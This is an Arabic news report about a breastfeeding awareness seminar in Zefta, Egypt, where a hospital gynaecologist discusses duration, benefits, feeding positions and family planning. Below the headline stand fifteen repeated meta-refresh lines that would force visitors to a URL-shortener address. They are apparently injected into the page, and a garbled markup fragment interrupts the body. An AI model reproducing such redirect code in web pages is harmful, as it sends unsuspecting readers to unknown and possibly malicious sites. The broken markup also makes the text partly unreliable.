إعلام زفتى ينظم ندوة بعنوان ” أهمية الرضاعة الطبيعية “

equiv=”refresh” content=”0; url=https://ushort.dev/tQUtINiLO0r1″ />
equiv=”refresh” content=”0; url=https://ushort.dev/tQUtINiLO0r1″ />
equiv=”refresh” content=”0; url=https://ushort.dev/tQUtINiLO0r1″ />
equiv=”refresh” content=”0; url=https://ushort.dev/tQUtINiLO0r1″ />
equiv=”refresh” content=”0; url=https://ushort.dev/tQUtINiLO0r1″ />
equiv=”refresh” content=”0; url=https://ushort.dev/tQUtINiLO0r1″ />
equiv=”refresh” content=”0; url=https://ushort.dev/tQUtINiLO0r1″ />
equiv=”refresh” content=”0; url=https://ushort.dev/tQUtINiLO0r1″ />
equiv=”refresh” content=”0; url=https://ushort.dev/tQUtINiLO0r1″ />
equiv=”refresh” content=”0; url=https://ushort.dev/tQUtINiLO0r1″ />
equiv=”refresh” content=”0; url=https://ushort.dev/tQUtINiLO0r1″ />
equiv=”refresh” content=”0; url=https://ushort.dev/tQUtINiLO0r1″ />
equiv=”refresh” content=”0; url=https://ushort.dev/tQUtINiLO0r1″ />
equiv=”refresh” content=”0; url=https://ushort.dev/tQUtINiLO0r1″ />
equiv=”refresh” content=”0; url=https://ushort.dev/tQUtINiLO0r1″ />
تحدث في الندوة الدكتور محمد النجار اخصائي نساء و توليد و نائب رئيس قسم النساء و التوليد و مدير عيادة العنف ضد المرأة بمستشفى زفتى العام موضحاً المقصود بالرضاعة الطبيعية .
وقال ان مدة الرضاعة الطبيعية 6 اشهر طبقاً لمنظمة الصحة العالمية و تختلف من دولة الى اخرى حسب الثقافة .
و تناول فوائد الرضاعة الطبيعية بالنسبة (ل 6367657184350926734ydpdd868b9btext_exposed_show”>لأم ـ الطفل ).
و اشار الى الاوضاع الصحيحة للرضاعة .
و ذكر بعض المشاكل قد تحدث للأم اثناء الرضاعة الطبيعية .
وقام بعرض وسائل تنظيم الاسرة .
وفي النهاية دار حوار نقاشي بين الجمهور و المحاضر و طالبوا بضرورة عمل برامج توعية في وسائل الاعلام المختلفة بأهمية الرضاعة الطبيعية و فوائدها حيث ان الرضاعة لمدة الـ6 اشهر الاولى ترفع معدلات الذكاء لدى الاطفال.
شارك في الندوة موظفو مجلس المدينة و الري .
ادار اللقاء احمد عادل مجاهد مسئول الاعلام السكاني .
و محمد مصطفي عبده ـ اخصائي اعلام .
تحت اشراف محمد صلاح رضوان مدير المجمع الاعلامي .
و سمير مهنا مدير عام ادارة اعلام وسط الدلتا .





